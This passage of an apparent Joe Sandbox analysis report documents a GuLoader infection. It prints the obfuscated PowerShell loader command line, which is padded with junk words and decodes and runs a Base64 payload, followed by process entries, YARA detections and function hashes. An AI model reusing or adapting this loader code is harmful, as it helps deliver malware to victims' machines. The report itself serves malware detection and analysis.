kninASh,wpir ecretrFarvebiEsti evSpildeeFritstrScuddyiTeutonnInstang.planc.Slu.reHIndstue UstemaR.nteudUrinrre.inuatrNord.es Main [Nongro$BrightGGaase atermi.rHaut.bc Analcoaffe tn ddann7f.rktr2misfat] Baryl=Bademe$ApicalSAntir p aadevlFo,mossPolarieTetrakr');$Railmen=Emissionskursers 'IntertD FeltmoVejskiwsmittenPhonoclSalicioF,rmalaSamoa dGuldinFInspe iKvrknil igfae';$Unweeping=Emissionskursers 'R ngwa$Offs,dAWongatr Sjaskr D,zziito.ingvBill,de allitrS aatriblacksnprocelg Comme.Deworm$Musco RH.rrelaIliopuiOmganglRiotoumCollegeBetragnKapit,.A flueI ta ninMarn,evFoxf,noUn ammkWelcheeSwampi(Middel$OveranaKeystou BougetGa acto Niveag Triumi DsenarInfr loColeus,bebygg$Res.mbHAfmrknyEmbathkApocenlOutbare Beshr)';$Hykle=$Ananasernes;Meyers (Emissionskursers 'Chambe$UncontG fr talCharksOFraterb AlterAOptrapltronst:IlannamUenighUBilledSAltereCNedbraomunifiVGrdetmiNulkom=Palaeo(R glant MarteeSte.ogs BoyarTCo,tem- BroddP mbiseaM,scletPsalmbh B erg Cchadd$Unnatuh Hypo YE tervkRa.ioal AfdelEUf.log)');while (!$Muscovi) {Meyers (Emissionskursers 'Dramat$BankrvgOverfolMavendoTilkenbV katiaSouthilSpl tt:BegyndM nskede gmainrImploro,ienerhKam.maeRevened SundhrK mmana meanil Nytaa=Arb,jd$Scelp BHar,liaAfslaplXantipuBrugerc uperch GalleiG lvantSemiwoh orsvaeGaloperSothooe') ;Meyers $Unweeping;Meyers (Emissionskursers 'Udrigg[Ani latOrcharHFredniRRudderEIndfataRundb dS,ansnII terbNNonin g Ido a.KluddetDeponeh T cksRClo ureInsatiaAirp,oDIdioma]Draebe:horosc:LeveriSRonaldLTach nEdo selEProcomp Qua b( Beamm4Outson0Supped0Brnebi0Betray)');Meyers (Emissionskursers ' ilate$JamanlgWowserLSang loSatyr BVerdena,ursusl ormal:Po.ariMScenogU Lacews ldkogCSupersoJuxtalvIrr taINonenf= Indiv(Pan ulT NrigsE ObjeksS orheT psvul-ProstopFordleaReturntPrepach Confe Ste l$ RymedhMeet nyYikemakOvermilElektrEPanteb)') ;Meyers (Emissionskursers 'Unpack$Ombygng KombilresundO StigebUnciv aLkk.stlOmbe,r:No melU sgsmadLsningLMeroblABwanasAAgnominglibchISnakk nGaardhGBarylee xonicr ericin,osshee 
Karto=,agmem$PatriagSkumsslFloraeoBu,iksBRhinocaM gnoll Fiske: Kvar T vespeeKithlenTandstS Tale,eSublots nstettDillwe+Slaaes+Gul nc%Vel et$Angrebi Re reNDar,hiTTortonE rvler dipoORevereRKonstaBAmerinIBrasbetKindlya OmnitlUnderp. Reinsc Ma,ksORasu.euIgnoren A,klit') ;$autogiro=$Interorbital[$Udlaaningerne]}$Genkendelsesgldes=450598;$Discommodes=31792;Meyers (Emissionskursers 'Dionas$Sc,lptGt,bercLJagt dO Ant cbHovediADi kdrlAureit: ejlfrOForudsuInco.ntGranosrRingtiIlavestvForejueKlevog Falho=Fotomo Mirl GS nipre LadegT Anspn-bandalCAssasso DemilnParatvtSkrupge behagn P.efeTDefunc Buffoa$Valk rhByggefYMintmakAgatysl Krimie');Meyers (Emissionskursers 'Pro on$SponsigSkole,l Un.emoMorosibBronstaBl,torlFalsks:Da friFSidiafrBlem si Tumbrgaptereg Fo sgaIp podsEpitaf Politi=Sancyi Dypnin[Rampe,SK,ststyGavnlisEfterttProbere DarwimAffl x.S ofmnCPri ato amilinpromisvYeardfeSaladirSindsbt Efter]A ambi: Geoto:KirketFtelio.rBrevaaoDonsiemReprepBFornufa F,lcosUndeciePalmes6Hofl.v4Mashy SRavagetSolh trPiedesiCheepsnBesvreg Kdeda(Femini$Ke nerOStigb.uRigsantN nocurAnomali Emir vAfspejeDyrtid)');Meyers (Emissionskursers 'A skil$ ResurgDupliclU,selhoInstrub CurreaGnomolLMicroc:Al erdH naverATrolloiImpastREternap .eminiIndbeteNonconc Supp E PolixsHensid Immor,=C,asse Ove de[ Colums BoardySi,hons Oral T aanenEAfvrgemI,iaut. b,rdeTAffricEweekenXPulserTPantei. 
MiscoEGrundlN Hjr,sCblack,oGr sesdOverspi BenzoNPedestG Lek r]E sfar:Skrald:SociosaUnbundSUntremcTurtosITribulIAstipu.bohe sGAsked EOptageTSapr.zsEkstraTBe tiaRMidbaniOverdenGreendGCruisi(Marent$FrerhuFFusionRJoylesiRa.erkg SmrokGKursusA NordasB.ndol)');Meyers (Emissionskursers 'homolo$Skrto gVacuoll BandeoLie erBDeglamAUv alrlCrossk:A tianEMet olMInsu tETroll nUd oerdi,expaAMeloidtF.sobaiCrouchODi.socnBacktrEUd indrVerveln Re.dieT.nkel=Knogle$ K,ntrH Gad daKulakiI.rander SociapFred.iIAllerveR.msteCLast iEmasochsColour.Stansnspolydiu ColorBSanin,sgrayliTSpoonbR,aseloiKyakgyNOverlegYe ked(Aktivi$waff,egEpicurE SlubbNIntetkKBat.ysEInter,NKnivstDLiturgETodageLMetwanS vedeePju,kpsOverprGKvastblCrossrd UnambEOverp SC,ncel,Highla$TokenlDTortoiIHypomasBhutlaCHe ophOPrivatmMediatMGgemadOTaljebD AfslrEBlaekcs Overt)');Meyers $Emendationerne;"
                                    Imagebase:0xd20000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2119893236.00000000092E7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:02:12:35
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff74be10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:9
                                    Start time:02:12:44
                                    Start date:08/04/2025
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Imagebase:0x7ff78b730000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:18
                                    Start time:02:14:12
                                    Start date:08/04/2025
                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                    Imagebase:0xa50000
                                    File size:59'904 bytes
                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000012.00000002.2336376984.0000000004897000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    Executed Functions


Executed Functions

                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r
                                    • API String ID: 0-2119891490
                                    • Opcode ID: a1e4d80e75d15d91d6ad1e9319f86e94efb63e9d552282a18ae94d96d90e1bc8
                                    • Instruction ID: 944ec2e8d624cc3e2013f005c1333c27b9f82d57326ce04d5672e3e98f068778
                                    • Opcode Fuzzy Hash: a1e4d80e75d15d91d6ad1e9319f86e94efb63e9d552282a18ae94d96d90e1bc8
                                    • Instruction Fuzzy Hash: 21F15B74B003049FD754CF98C555BAAB7B2AB88318F24D069EA059F395CB72ED43CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r
                                    • API String ID: 0-2119891490
                                    • Opcode ID: 827dc869cb29bd94cab2fcc03fff0aaecd4565bdebe81270963fb9e2b86fc3cb
                                    • Instruction ID: e42e0945ba7e80b6d3c85f060b702b81535f2ddefea9c401d7805a7d5118dd66
                                    • Opcode Fuzzy Hash: 827dc869cb29bd94cab2fcc03fff0aaecd4565bdebe81270963fb9e2b86fc3cb
                                    • Instruction Fuzzy Hash: 5441E339F00305DFEBA49E69D5057FAB7E6AF85214B24907AD406CB251EB32C943C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: tP;r$tP;r
                                    • API String ID: 0-3438757700
                                    • Opcode ID: ec24cdbba82965faf4bb700478346ec24aa629df6624927c1e3b243fbe962292
                                    • Instruction ID: 25c61d86f18e5967aa2db455fcbcfc629605892008babd4c17b03c5ea7f643a8
                                    • Opcode Fuzzy Hash: ec24cdbba82965faf4bb700478346ec24aa629df6624927c1e3b243fbe962292
                                    • Instruction Fuzzy Hash: 6D310536F003159FDB609B69D940BEAF7A6EFC5218F28807AE5168B641DB32DC03C791
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: h]$n$I$n
                                    • API String ID: 0-1388317859
                                    • Opcode ID: 6aeb4dcf91592472e1167eb09de97f174825b5dda8b480c2fcb21d3a84535d62
                                    • Instruction ID: d5359322e19b21fa53ecab13f573ce21e0db5ede2b7525ecd25b28a3fd737ff5
                                    • Opcode Fuzzy Hash: 6aeb4dcf91592472e1167eb09de97f174825b5dda8b480c2fcb21d3a84535d62
                                    • Instruction Fuzzy Hash: AD313834A002188FCB2AEB64C8447EEB7F6BF89305F1044E9D919AB351CB359E85CF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $;r$$;r
                                    • API String ID: 0-214785769
                                    • Opcode ID: ca4cf272fada725777d4370fed43268cd97599c0b79e6e7e275d11150610e5c0
                                    • Instruction ID: d413fc5095de4ad62e216ade162da7912be6311dde7bd8238aa4b532b23265de
                                    • Opcode Fuzzy Hash: ca4cf272fada725777d4370fed43268cd97599c0b79e6e7e275d11150610e5c0
                                    • Instruction Fuzzy Hash: 14215735A083846FEBB509364D00BB33F664FD2608F289197EB44DB292D57B8A4AC371
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $;r$$;r
                                    • API String ID: 0-214785769
                                    • Opcode ID: a0c16c12b80726d78fc7558eab50b8b4391f79eef2ed9bc39a125d73407837f5
                                    • Instruction ID: f1b6e92d9a404bf1050b6302a775779fd7614a68acf735103a9930dba20b99ec
                                    • Opcode Fuzzy Hash: a0c16c12b80726d78fc7558eab50b8b4391f79eef2ed9bc39a125d73407837f5
                                    • Instruction Fuzzy Hash: AA21793AE08351DFCFA19F6889002E5BFB4AE492107154197DC48EB3CAF3359906C7E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: x.k
                                    • API String ID: 0-3814145804
                                    • Opcode ID: 567435ba297503250edb48c344d2e93f43bfe98c45e9249a4eef9f2710a174c6
                                    • Instruction ID: 19a4cdcd6df62bef1235606a6eeaa3aa8dee6cd236094fde2ad23b9d58771c34
                                    • Opcode Fuzzy Hash: 567435ba297503250edb48c344d2e93f43bfe98c45e9249a4eef9f2710a174c6
                                    • Instruction Fuzzy Hash: 93B1A130B003049FEB54DBA4C945BAEB7E3AF89304F248169E9056F795CB32EC46CB91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: x.k
                                    • API String ID: 0-3814145804
                                    • Opcode ID: ed112fe43fe4777f5e636760a8fe30788787ce03a918c3cca1d0f261a411287b
                                    • Instruction ID: 835d22884646fdb9215411e8dc65b89f48e8e467c753c62877118e29091138c5
                                    • Opcode Fuzzy Hash: ed112fe43fe4777f5e636760a8fe30788787ce03a918c3cca1d0f261a411287b
                                    • Instruction Fuzzy Hash: 06918E30A00304DFDB54DB98C945BAEB7B3AF89304F249169E9056F795CB72EC46CB91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r
                                    • API String ID: 0-3786809255
                                    • Opcode ID: 935cdae04394a1f33762ba8836b6619c1cce316f483910bca194aa74068fc2e3
                                    • Instruction ID: 2b2ebe14ed2d3534002c3efdd4e0fb669fdbc38f7bb033723b0c0a4958fedc56
                                    • Opcode Fuzzy Hash: 935cdae04394a1f33762ba8836b6619c1cce316f483910bca194aa74068fc2e3
                                    • Instruction Fuzzy Hash: 99310838E04341EFEBA0CF25C541BFABBB1EF46254B58906AD405CB1A2D735C843C7A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: x.k
                                    • API String ID: 0-3814145804
                                    • Opcode ID: d1a2911028941016375561d5d75fbd3536f442456acb366f0804b70bb810edba
                                    • Instruction ID: cd8b33e76ade0abdefb08402847a326267c156b12f06594b1408f0015d872ad2
                                    • Opcode Fuzzy Hash: d1a2911028941016375561d5d75fbd3536f442456acb366f0804b70bb810edba
                                    • Instruction Fuzzy Hash: B7316D30B00204AFE754ABA4CD55FAF76A7AB85744F24C524E902AF391DF76DC428B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: tP;r
                                    • API String ID: 0-723269967
                                    • Opcode ID: 169e290320ee56e95e5fff42a4d437da93a13eae78e17fbecf088510f69db8e0
                                    • Instruction ID: 7bc9b54f7f609a8b213f58934fdff2a73a2d92a56d8645175d7ad2600810eaed
                                    • Opcode Fuzzy Hash: 169e290320ee56e95e5fff42a4d437da93a13eae78e17fbecf088510f69db8e0
                                    • Instruction Fuzzy Hash: C811D635F003019FDBA08F55C941FEAFBA6EFC5318F288169E9189B691C732D942C791
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e7384f59ece0631947177b2bde647db6949f0884dcd33ae74a10a5eff105ea2c
                                    • Instruction ID: 38c4ddd21a2477dfa4c482b7c94ca53cb0b7953c7491100c32b208b563083023
                                    • Opcode Fuzzy Hash: e7384f59ece0631947177b2bde647db6949f0884dcd33ae74a10a5eff105ea2c
                                    • Instruction Fuzzy Hash: 09224E74B013049FE744CB98C555FAAB7B2AF89309F24C069E9059F395DB72EC42CB92
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79c2b846a0e6264fa457ed9357c2b9e496fb10da66a3f35660fbd74e79e1c858
                                    • Instruction ID: 9852590b5e03dbb4995746a7584f94df53b602f5c0d9f7c88fb87f23547c1079
                                    • Opcode Fuzzy Hash: 79c2b846a0e6264fa457ed9357c2b9e496fb10da66a3f35660fbd74e79e1c858
                                    • Instruction Fuzzy Hash: B0224D74A05304EFD744CB98C951FAABBB2EF89318F158059E9059F391CB72EC42CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 88fa63b85572824fa57772dae16ffd5ed0093be0676a1f376ab6ba2290271df5
                                    • Instruction ID: ae2415c98c75006a9fa97dbf930ce5681ec85576abd9ebb3d15e6e32094a9638
                                    • Opcode Fuzzy Hash: 88fa63b85572824fa57772dae16ffd5ed0093be0676a1f376ab6ba2290271df5
                                    • Instruction Fuzzy Hash: 55F12974A01304DFD754CB98C591FAABBB2BB88319F24D059E9059F3A5C772EC42CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 53fee9242346a686c5f090ad54dbfebe3a0723e14a84b54f120d6a708ca79e66
                                    • Instruction ID: ec75be21950aa152e5fb539a726c76a87fcec95508dc91aa7f85c5f9fc58e5b8
                                    • Opcode Fuzzy Hash: 53fee9242346a686c5f090ad54dbfebe3a0723e14a84b54f120d6a708ca79e66
                                    • Instruction Fuzzy Hash: 5CE13A74B003049FE754CF98C551FAABBA2EB88318F14D069EA05AF395C776ED42CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 98ef49485aa2e6e807e9b49fb66cad7f3b2db12dbb4072b827e430301dda667f
                                    • Instruction ID: 67a521bb3f1dcf326760c42aa5438cc2aaaef1111472604cb2325ec5f94d3791
                                    • Opcode Fuzzy Hash: 98ef49485aa2e6e807e9b49fb66cad7f3b2db12dbb4072b827e430301dda667f
                                    • Instruction Fuzzy Hash: 9AE12A74A013049FD754CF98C541AAABBB2FF88318F14D06AEA15AF395C772ED42CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 78fbd8193fd556ee81239075cd5f18e6048e207e3c370b434bb21475f33647d6
                                    • Instruction ID: c417b2f51d14a8e4fa1b875c0dc96cc4e22534ab1e8f23f2841dfe7828b53e94
                                    • Opcode Fuzzy Hash: 78fbd8193fd556ee81239075cd5f18e6048e207e3c370b434bb21475f33647d6
                                    • Instruction Fuzzy Hash: 23C1D274A11219EFDB15CFA8D584A9DBBF2EF88311F248199E805AB351C731ED86CB90
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3c927ea6c46523841b771feb1f55a501fcaa172fc6e58916cc1016810fa8c208
                                    • Instruction ID: a14ee74401c36be4d3bb77b0b70593a16ad4492bbff1029a0c2519103c5c2456
                                    • Opcode Fuzzy Hash: 3c927ea6c46523841b771feb1f55a501fcaa172fc6e58916cc1016810fa8c208
                                    • Instruction Fuzzy Hash: 7DA18C31A002489FDB14DFA4D994E9DBBF2FF84301F254598E816AF265DB74AD89CB80
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6698f54234df4a43d944cc1d83308de860e4f0935c750c70c064d41ac607acfa
                                    • Instruction ID: e25994b3d56ea720b48010c344b028e15da2d71680adefea8b5e1bd9d4a86b8e
                                    • Opcode Fuzzy Hash: 6698f54234df4a43d944cc1d83308de860e4f0935c750c70c064d41ac607acfa
                                    • Instruction Fuzzy Hash: D1917D74A016058FCB05CF59C594AAEFBF1FF89310B2486A9D855AB3A5C736FC41CBA0
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48c1ba8e35a32e07592ba92094b3ba0d39d94966660e3f6fbfc3e9b43201a164
                                    • Instruction ID: fc984fa410147e89312b2c96b48abf343de9d1428f63c47bc14badb0253edb91
                                    • Opcode Fuzzy Hash: 48c1ba8e35a32e07592ba92094b3ba0d39d94966660e3f6fbfc3e9b43201a164
                                    • Instruction Fuzzy Hash: 9C713E30A002489FDF15DFA8D594BADBBF6FF88305F1484A9D811AB790DB71AD4ACB50
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 72c36e405da0b3b57d5d43980807d8f6866f2144009c2dda8052b6c1a611811a
                                    • Instruction ID: 08c50533155629b3d02cd6d7e4f8e11bf66909dd6df199bfe258cdd215d054d7
                                    • Opcode Fuzzy Hash: 72c36e405da0b3b57d5d43980807d8f6866f2144009c2dda8052b6c1a611811a
                                    • Instruction Fuzzy Hash: 2E611774A10204EFE754CB94C551EAAB7B2AB88309F25D069E9059F391CB72EC42CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e431c6bdec429a83d8b249e1c2a568391649d1ce7226fe3a151b0c03b01edbac
                                    • Instruction ID: 6a9ce51aa3744e83fdef7ea1a85650296c2e8f8c88af1e321cc9c1b4ded91f84
                                    • Opcode Fuzzy Hash: e431c6bdec429a83d8b249e1c2a568391649d1ce7226fe3a151b0c03b01edbac
                                    • Instruction Fuzzy Hash: ED612874A10205EFD754CB98C551EAAB7B2FB88309F24D069E9059F391CB72EC42CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c74467c1ac5ecb8d92e9a77bad6264a9eccc79614b91df8555a19245adbe2cf
                                    • Instruction ID: 6342d2637a6bf92b872d552458c462279834b6e71d40cf79ec181b90699e1d27
                                    • Opcode Fuzzy Hash: 0c74467c1ac5ecb8d92e9a77bad6264a9eccc79614b91df8555a19245adbe2cf
                                    • Instruction Fuzzy Hash: 5C517DB190D3C09FDB03DB68C8A4699BFB0AF57210B0A40D7D494DF2A3D625DC49CBA6
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d6738c9ef1b59b09b6c9c49cace8f1bd95a38f9ef2d421c59718bc0eb3516919
                                    • Instruction ID: ce8d753437b8ba45e978f5800d55f6b89fba0bc0f93f2a79b7b59c4198e956d5
                                    • Opcode Fuzzy Hash: d6738c9ef1b59b09b6c9c49cace8f1bd95a38f9ef2d421c59718bc0eb3516919
                                    • Instruction Fuzzy Hash: 32512C34A01218DFCB14DFA8D5849EDBBF2FF49311B2585A9E405AB361D731ED89CB50
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0a274f2f952da89e75d613679164ac0dbb5753c281fc4fa130fde6ea2f456b20
                                    • Instruction ID: b06c7e378fe05f298b0e80a3ab521dc17856ec1592a5482bc2aab1d812def45d
                                    • Opcode Fuzzy Hash: 0a274f2f952da89e75d613679164ac0dbb5753c281fc4fa130fde6ea2f456b20
                                    • Instruction Fuzzy Hash: 5A51BF30A043848FDB15DFA8C894BDDBBF2BF85305F1584AAD441AB2A2DB749D49CB91
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 11279e49138c870b4ac108ff0d69a69a0058780206c300d07fc17614eaebdd7a
                                    • Instruction ID: b028715bc098c87cd3d5fcfe1f8f09c40a9c79959e02845d7307806030cd02c9
                                    • Opcode Fuzzy Hash: 11279e49138c870b4ac108ff0d69a69a0058780206c300d07fc17614eaebdd7a
                                    • Instruction Fuzzy Hash: 47415D70A00258DFDB14DFA9C984B9DBBF6FF84305F1484A9D405AB7A1DBB0AD45CB80
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d06e0323a1ac3f394d3661de36ecf2ba820b9623765e5170a8c6c93ad2f9d97c
                                    • Instruction ID: ee9bd459393acc7fe0058a5a5f3dc12d0506827c45d823e9af5e93b1ca6335f3
                                    • Opcode Fuzzy Hash: d06e0323a1ac3f394d3661de36ecf2ba820b9623765e5170a8c6c93ad2f9d97c
                                    • Instruction Fuzzy Hash: EE414C70A002589FDB14DFA9C984B9DBBF6FF84305F148469D405AB7A0DFB0AD45CB80
                                    Memory Dump Source
